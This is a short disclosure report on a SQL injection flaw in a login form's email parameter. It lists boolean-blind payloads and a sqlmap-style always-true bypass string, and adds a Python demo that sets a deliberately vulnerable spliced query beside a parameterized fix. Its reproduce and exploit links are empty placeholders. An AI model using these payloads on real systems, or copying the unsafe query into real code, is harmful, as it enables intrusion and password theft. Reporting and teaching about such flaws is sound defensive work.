SCRMS-2023-05-27-1.0

Description:

The email parameter appears to be vulnerable to SQL injection. The test payloads 45141002' or 6429=6429-- and 37491017' or 5206=5213-- were each submitted in the email parameter. The two requests produced different responses, which indicates that the input is being incorporated into a SQL query in an unsafe way. An attacker can easily extract every user record together with the stored passwords and use them to access the system. Even if the passwords are strongly encrypted this only costs the attacker some time; if they are not strongly encrypted, decrypting them is no obstacle at all.

STATUS: HIGH Vulnerability

[+]Payload:

---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
---
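The differential response described above is the boolean-based blind check in its simplest form: the same wrong password sent with a true-condition probe and a false-condition probe gives two different outcomes when the email value is spliced into the query text, and the same outcome when it is bound as a parameter. The following is an added example, not code from the original report or the affected project; the SQLite schema, the account, the column names and the hashing helper are all constructed for illustration, while the two probe strings are the ones quoted in the description. The intended fix is the parameterized form, login_safe.

```python
import hashlib
import sqlite3

# Constructed sample account for this example (not from the original report).
USER_EMAIL = "alice@example.com"
USER_PASSWORD = "correct-horse"

# The true/false probe pair quoted in the report's description.
PROBE_TRUE = "45141002' or 6429=6429-- "
PROBE_FALSE = "37491017' or 5206=5213-- "


def pw_hash(password):
    # SHA-256 keeps the example short; a real login store should use a
    # slow password hash such as bcrypt, scrypt or Argon2 instead.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """In-memory SQLite users table with one account (constructed sample)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT)"
    )
    conn.execute(
        "INSERT INTO users (email, pw_hash) VALUES (?, ?)",
        (USER_EMAIL, pw_hash(USER_PASSWORD)),
    )
    conn.commit()
    return conn


def login_unsafe(conn, email, password):
    """Vulnerable pattern: the email value is spliced into the SQL text,
    so a quote in the input changes the structure of the WHERE clause."""
    sql = (
        f"SELECT id FROM users WHERE email = '{email}' "
        f"AND pw_hash = '{pw_hash(password)}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, email, password):
    """Hardened pattern: placeholders in the statement, values bound by the
    driver, so the input is only ever compared as data."""
    row = conn.execute(
        "SELECT id FROM users WHERE email = ? AND pw_hash = ?",
        (email, pw_hash(password)),
    ).fetchone()
    return row is not None


def responds_differently(login_fn, conn):
    """The boolean-blind check from the report: with a wrong password, do
    the true probe and the false probe lead to different outcomes?"""
    wrong = "not-the-password"
    return login_fn(conn, PROBE_TRUE, wrong) != login_fn(conn, PROBE_FALSE, wrong)


if __name__ == "__main__":
    db = make_db()
    print("unsafe differs:", responds_differently(login_unsafe, db))  # True
    print("safe differs:", responds_differently(login_safe, db))      # False
    print("safe valid login:", login_safe(db, USER_EMAIL, USER_PASSWORD))  # True
```

responds_differently is also a usable regression test for the fixed handler: once the query is parameterized, the two probes must give the same answer, and a valid email/password pair must still log in.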

Reproduce:

href

Proof and Exploit:

href

Time spent:

01:00:00